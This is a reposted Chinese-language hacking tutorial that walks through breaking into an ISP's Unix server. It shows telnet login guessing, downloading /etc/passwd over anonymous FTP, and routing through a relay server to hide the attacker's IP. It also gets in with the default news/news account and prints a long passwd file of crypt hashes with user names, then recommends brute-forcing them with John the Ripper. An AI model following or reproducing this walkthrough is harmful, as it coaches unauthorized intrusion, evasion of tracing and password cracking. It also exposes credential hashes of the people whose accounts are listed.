转载:
>telnet www.fatman.com.tw (先用telnet过去)
Trying 1.145.256.139...
Connected to www.fatman.com.tw.
Escape character is '^]'.
fatman login: guest (先试一试guest这个公用帐号看看)
Password:
Login incorrect (阿~~不成功..没关.我再试)
fatman login: news
Password:
Connection closed by foreign host.
(哇~~才两次不成功就被赶出来了喔....这个系统还真狠..@&!J#~!)
> telnet www.fatman.com.tw (没关...再给它玩看看)
Trying 1.145.256.139...
Connected to www.fatman.com.tw.
Escape character is '^]'.
fatman login: fatman (骇客的第六感...)
Passwd:
Login incorrect
fatman login: system (这是系统的预设帐号...)
Passwd:
Login incorrect (看来已经被改过了..)
Connection closed by foreign host.
>ftp www.fatman.com.tw (改用ftp看看)
Connected to www.fatman.com.tw.
220-
220-
220- Fatman Communication Services ,INC
220-
220- Fatman有够烂服务有限公司
220-
220- 高雄 FTP server
220-
220- There are 4 users in FTP Server now.
220- 目前已有 4 使用者在此 Server 上.
220- If you have any suggestion, please mail to:
220- user@hostname.
220-
220-
220-
220 fatman FTP server (Version wu-2.4(2) Tue Oct 15 15:53:37 CST 1996) ready.
User (www.fatman.com.tw none)): fatman (还是一样试一下公司的名字)
331 Password required for fatman.
Password:
530 Login incorrect.(真失败~~今天运气好像不太好的样子)
Login failed.
ftp> user anonymous (用anonymous的公用帐号看看好了)
331 Guest login ok, send your complete e-mail address as password.
Password: (密码随便打..千万别傻到打真的e-mail..打qq@就好)
230 Guest login ok, access restrictions apply.
ftp>pwd
(终於进来了..好辛苦~~~..先看看自己在那个资料夹在说)
257 "/" is current directory.
ftp> ls -la
(寻找一下目标 /etc)
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 8
drwxrwxr-x 8 root wheel 1024 Feb 2 01:21 .
drwxrwxr-x 8 root wheel 1024 Feb 2 01:21 ..
drwxrwxr-x 2 root wheel 1024 Jun 10 1996 bin
drwxrwxr-x 2 root wheel 1024 Jun 10 1996 etc
drwxrwxr-x 2 root wheel 1024 Dec 3 1993 incoming
drwxrwxr-x 2 root wheel 1024 Nov 17 1993 lib
drwxrwxr-x 2 root wheel 1024 Feb 2 01:20 pub
drwxrwxr-x 3 root wheel 1024 Jun 10 1996 usr
226 Transfer complete.
491 bytes received in 3.13 seconds (0.16 Kbytes/sec)
(嘻嘻....找到目标了..)
ftp> cd etc
(马上攻击进去)
250 CWD command successful. (嗯~可以进来...)
ftp> ls -la
(再看一下有没有我们要的密码档/etc/passwd)
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 4
drwxrwxr-x 2 root wheel 1024 Jun 10 1996 .
drwxrwxr-x 8 root wheel 1024 Feb 2 01:21 ..
-rwxrwxr-x 1 root wheel 258 Dec 3 1993 group
-rwxrwxr-x 1 root wheel 532 Dec 3 1993 passwd
226 Transfer complete.
251 bytes received in 0.00 seconds (251000.00 Kbytes/sec)
(不会吧...竟然那麽容易)
ftp> get passwd
(二话不说..马上抓密码档下来...呵呵.)
200 PORT command successful.
150 Opening ASCII mode data connection for /etc/passwd (321 bytes).
226 Transfer complete.
5515 bytes received in 1.60 seconds (1.01 Kbytes/sec)
ftp>bye
221 Goodbye.
(马上走人)
>cat passwd
(看一下刚才的密码档是....)
root:*:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2 aemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0 perator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:65535:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
.
.
.
[以下省略]
(真衰..是shadow过的密码档....也难怪用anonymous就能抓下来..如果就只有这个的话
就无法解开密码了....但是可以从面的帐号知道fatman有提供那些服务.像是uucp .
mail . ftp . news ...operator是开机用的,所以没有用.daemon是用来分佩每一个帐号
的权限用的)
>rm passwd
(还是把它给消到好了...)
>^D
(好累..先讲到这吧...至少已经知道怎麽入侵到系统面了)
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
[休息时间]
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*--*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
嗯~~接著上次还没说完的话题..
上次是拿到了已经shadow过的/etc/passwd!!别以为它没有用喔...呵呵..虽然不能直接用
它还破解密码.但是它也为我们收集到一些系统的资讯..现在就在把它拿出来看看吧...
SunOS 5.6
login: Love-gone
Password:
Last login: Sun May 10 15:01:45 from 111.222.333.444
tcsh: getwd: Cannot open directory "../" (Permission denied)
tcsh: Trying to start from "/home/Love-gone"
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
Copyright by Andrew Chen 98/01/07
You have new mail.
(还是一样先连到中间伺服器,这样可以确保不在攻击的系统内留下自己的ip..别人也
就不能用逆流法来找了...但是中间伺服器是越多越好!!)
>who
(还是看一下安不安全)
judge4 pts/1 May 10 15:17 (111.222.333.444)
root console May 9 12:24 (:0)
root pts/9 May 9 12:24 (:0.0)
(还是一样没人管)
>telnet www.fatman.com.tw
(攻击开始...)
Trying 1.145.256.139...
Connected to www.fatman.com.tw.
Escape character is '^]'.
fatman login:nobody (先试一试被shadow过的密码档的帐号)
Password: (密码也打nobody...)
Login incorrect
fatman login:news (再试一下这个好了..)
Password: (也是news..)
Linux 2.0.29.
You have mail.
(呜哇啦!!!!进来了....千万别看别人的信喔..)
fatman:~$ cd /etc (看能不能进来)
fatman:/etc$ ls
(看一下...)
DIR_COLORS hosts passwd.old
HOSTNAME hosts.allow passwd.save
HOSTNAME~ hosts.allow~ passwd~
NETWORKING hosts.deny ppp/
NNTP_INEWS_DOMAIN hosts.equiv printcap
X11@ hosts.lpd profile
aliases inet@ protocols
aliases.dir inetd.conf psdevtab
aliases.pag inittab rc.d/
at.deny inittab.gettyps.sample resolv.conf
bootptab inittab~ resolv.conf~
csh.cshrc ioctl.save rpc
csh.login issue securetty
default/ issue.net@ securetty.old
diphosts issue~ sendmail.cf
exports klogd.pid sendmail.st
fastboot ld.so.cache services
fdprm ld.so.conf shells
fs/ lilo/ skel/
fstab lilo.conf slip.hosts
ftp.banner localtime slip.login
ftp.deny magic snooptab
ftp.pids-local mail.rc sudoers
ftp.pids-remote motd syslog.conf
ftpaccess motd.bak syslog.pid
ftpconversions msgs/ termcap
ftpgroups mtab ttys
ftpusers.old mtools utmp@
gateways named.boot.bak vga/
gettydefs networks wtmp@
group nntpserver yp.conf.example
group~ passwd
host.conf passwd.OLD
fatman:/etc$ cat passwd
(接下来就直接看密码再说...)
root:L3mUc0CQtJbtQ:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2 aemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0 perator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:65535:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
www:et9dAbOK/d.22:502:20:WWW Manager:/home/staff/www:/bin/bash
kanglin:MuPKS0CUvOTZY:506:100:Kanglin:/home/w3/kanglin:/bin/bash
bakery:Cyaxe9TzJ231w:508:100:Bakery:/home/w3/bakery:/bin/bash
carven:9qdffJaMgRxih6g:509:100:Carven:/home/w3/carven:/bin/bash
prime:nPOlsQhQFJ.aM:511:100:Prime:/home/w3/prime:/bin/bash
thfam:TMaFWlpc1jjwk:512:100:XXXXXXX:/home/w3/tham:/bin/bash
ccc:GqETv4g.CkVwI:513:100:ccc:/home/w3/ccc:/bin/bash
sk:sLz71sff56MVuY:514:100:sk:/home/sk:/bin/bash
services:9yBqHWfnnNr.k:515:100:XX:/home/w3/haurey/services:/bin/bash
order:LpnMHVgy9M/YU:516:100:XX:/home/w3/haurey/order:/bin/bash
corey:mhRsFO60fdFsMU:517:100:XXXXX:/home/w3/haurey/corey:/bin/bash
richard:fzhKTHW8.CKqU:519:100:richard:/home/w3/richard:/bin/bash
lilian zxKeTsi5REIQ:520:100:lilian:/home/w3/lilian:/bin/bash
support:vn0bgtsLAlF1HU:521:100:support:/home/w3/support:/bin/bash
hotline:BiSzCJsDhVl7c:522:100:hotline:/home/w3/hotline:/bin/bash
stosnny:hXgyLXFqcs/AHM:523:20::/home/staff/stonny:/bin/csh
becar onscgh0GVY/5c:524:100:bear:/home/w3/bear:/bin/bash
lanxce:IPf7USG6iwgxBEI:525:20:Chien-chia Lan:/home/staff/lance:/bin/tcsh
taiwankk:ijPWXFxmRF79RY:526:100:hotline:/home/w3/taiwankk:/bin/bash
lihxeng:6hGixt6xKgezmo:528:100:prime liheng:/home/w3/liheng:/bin/bash
caves:MiDgr92ymp2Mg:529:100:gallery:/home/w3/caves:/bin/bash
salecs L3OnAueiqVfw:518:100:prime:/home/w3/prime/sales:/bin/bash
kingtel d7SRJ9xe/FjhM:530:100:kingtel:/home/w3/kingtel:/bin/bash
cp:ISunFXY9M0Hgc:530:100:kingtel:/home/w3/kingtel:/bin/bash
recycle1:JgbZHVRE4Jf3U:531:100:recycle1:/home/w3/recycle1:/bin/bash
recycle2:M0l95vf9h7vic:532:100:recycle2:/home/w3/recycle2:/bin/bash
recycle3:XhyoUBFQspiS2:533:100:recycle3:/home/w3/recycle3:/bin/bash
recycle:CizrTipBMw/HE:534:100:recycle:/home/w3/recycle:/bin/bash
hxnet:KhB./jHw.XNUI:536:100:hxnet:/home/w3/hxnet:/bin/bash
goodbook:Ul8iUr9FzoFw2:535:100:goodbook:/home/w3/goodbook:/bin/bash
sales1:JmKzPOBMIIYUI:537:100:sales1:/home/w3/prime/sales1:/bin/bash
rwu:Pai8mYCRQwvcs:539:100:rwu:/home/w3/kingtel/rwu:/bin/bash
charliex f6HaxdxkDBDw:540:100:charliex:/home/w3/kingtel/charliex:/bin/bash
jdlee:Mhq3gZNup9E3Q:538:100:jdlee:/home/w3/kingtel/jdlee:/bin/bash
tkchen:GkTU8ecYIXEyw:541:100:tkchen:/home/w3/kingtel/tkchen:/bin/bash
slb lf22.gHBZ.QQ:542:100:slb:/home/w3/kingtel/slb:/bin/bash
s6t4:GnHFCPdZX7nkU:543:100:s6t4:/home/w3/kingtel/s6t4:/bin/bash
lsh:GftygyOntHY6Y:545:100:lsh:/home/w3/kingtel/lsh:/bin/bash
nalcom:XziVebJA8EO1.:546:100:nalcom:/home/w3/prime/nalcom:/bin/bash
jordon:mPgNPVEkIEORM:547:100:jordon:/home/w3/jordon:/bin/bash
toonfish:wTscIuas4EeTE:548:100:toonfish:/home/w3/toonfish:/bin/bash
yahoo CIF2rp23sAZE:549:100:yahoo:/home/w3/yahoo:/bin/bash
basic:VlM0BAFKD314U:550:100:basic:/home/w3/basic:/bin/bash
basic1:Mi0gv.LN2wj2A:550:100:basic:/home/w3/basic:/bin/bash
basic2:FifwXaOXQy.J6:550:100:basic:/home/w3/basic:/bin/bash
basic3:VjgWDVTrpZ3uM:550:100:basic:/home/w3/basic:/bin/bash
basic4:fj3oHbeObcN46:550:100:basic:/home/w3/basic:/bin/bash
wunan:gdBvMnS0849pU:551:100:XXXXX:/home/w3/wunan:/bin/bash
kaoune:vd5VCD9OE87Ak:552:100:XXXXXXX:/home/w3/kaoune:/bin/bash
shuchuan:8et34aLi8OuyA:553:100:XX:/home/w3/shuchuan:/bin/bash
culture:ulQCNUH8dNmTo:551:100:XXXX:/home/w3/wunan:/bin/bash
fan:Jk6E9PqP7rxemg:554:100:fan:/home/w3/toonfish:/bin/bash
pierre:m9EpXqETIdvWM2:555:100:pierre:/home/pierre:/bin/bash
bausch:snwtjqhusCyqxQw:556:100::/home/w3/bausch:/bin/bash
saatchi:RIJ4layRsdHRBSM:557:100:XX:/home/w3/saatchi:/bin/bash
office:st0H2jg2gQjEqvI:558:100:XX:/home/w3/office:/bin/bash
poja:p7ptVmOq3nrUL.:559:100:XXXXXXXX:/home/w3/poja:/bin/bash
michelle:AmcgVpzMufCZJs:560:100:michelle:/home/w3/kingtel/michelle:/bin/bash
kloop:HboPgsyfndbAnE:544:100:XXXX:/home/w3/kloop:/bin/bash
people:Br.sC8VNnDVsA46:561:100:XXXX:/home/w3/people:/bin/bash
net:*MgwAiyhlgelfaU:564:1:*:/home/net:/bin/bash
caves0:PnjQ46ePzjx5xg:562:100:caves0:/home/w3/caves0:/bin/bash
erichou gkOzzWs0wVAwU:563:100:xxxx:/home/w3/erichou:/bin/bash
mikehxou h0Xkkf.PhfepWs:565:100:mikehou:/home/w3/mikehou:/bin/bash
stevehou:IjIRrpcMz4K/ek:566:100:stevehou:/home/w3/stevehou:/bin/bash
water:B.9eP0GITFCgs:567:100:tiawanKK:/home/w3/water:/bin/bash
kanox:HoIbp4FOfvFmc.:568:100:tiawanKK:/home/w3/kanox:/bin/bash
louisa:u1gzbBv76EXBSU:569:20::/home/staff/louisa:/bin/csh
banafna:Ew5x9rZDifhfheCQs:570:100:xxx:/home/w3/banana:/bin/bash
trendfy:lHBdw2hGbNBZAI:570:100:banana:/home/w3/banana:/bin/bash
yenyun88:BbyphrvmuE7ww:571:100:toonfish:/home/w3/toonfish:/bin/bash
tonghai:KfwH4OYNQsK3c:572:100::/home/w3/tonghai:/bin/bash
chunti nhdw0Yso8EMpo:574:100::/home/w3/chunti:/bin/bash
jengjr:eH2UAa9VZI3hk:573:100:Jeng-jr LI:/home/jengjr:/bin/bash
chiniafn:FjYbcbfdhaJsk2vhON6:575:100:Chinian Wang:/home/chinian:/bin/bash
.
.
.
[以下省略.密码档我已经尽量码赛克了]
(哇....太好了!!赶快换ftp来秀一下吧~~~)
fatman:/etc$ ^C
>ftp www.fatman.com.tw
(ftp兄来了...)
Connected to www.fatman.com.tw.
220-
220-
220- Fatman Communication Services ,INC
220-
220- Fatman有够烂服务有限公司
220-
220- 高雄 FTP server
220-
220- There are 4 users in FTP Server now.
220- 目前已有 4 使用者在此 Server 上.
220- If you have any suggestion, please mail to:
220- user@hostname.
220-
220-
220-
220 fatman FTP server (Version wu-2.4(2) Tue Oct 15 16:53:37 CST 1996) ready.
User (www.fatman.com.tw none)): news (用刚才入侵时的那个..)
331 Password required for news.
Password:
331 news login ok!
ftp>cd /etc
250 CWD command successful.
ftp>get passwd
200 PORT command successful.
150 Opening ASCII mode data connection for /etc/passwd (5921 bytes).
226 Transfer complete.
5515 bytes received in 2.80 seconds (1.97 Kbytes/sec)
ftp>bye
(落跑了...闪喔!!)
221 Goodbye.
(/etc/passwd既然已经到手了...接下来的事你应该知道吧..啥??不知道吗???..那麽就在
此解说一下好了...)
[Love-gone的话]
拿到密码档(/etc/passwd)要做的就是破解它呀...看来我必须在这说明一下passwd的
格式和意义了...
例如:
root:L3mUc0CQtJbtQ:0:0:root:/root:/bin/bash
密码格式大多都是这个样子的.然每一栏都是用分号分开的..大多是6个分号...当然密码
格式有很多种..据我所知.目前我看过的密码格式有5种了...但是大多数应该都是用6个分
号的这种为多..然而每一栏代表的意义如下..
root:使用者名称
L3mUc0CQtJbtQ:是已经经过编译的密码(coded-password)
0:UID(User Identification Number),就是使用者辨识码
0:GID,就是使用群组的辨识码
root:comments,解栏..可能是电话号码or住址
/root:home directory,就是所谓的来源目录..即你的工作目录
/bin/bash:这一栏是表示使用者签入系统,第一个执行的程式
因为是已经编译过的单向密码(One-Way Passwd),所以不可能反组译....就只能使用所谓
的暴力破解法了..关於暴力破解法的程式有很多..在此就不讨论了解!我想你应该都知道
才对..什麽??说我无情??..好吧!!建议你我用的是John4.0
|
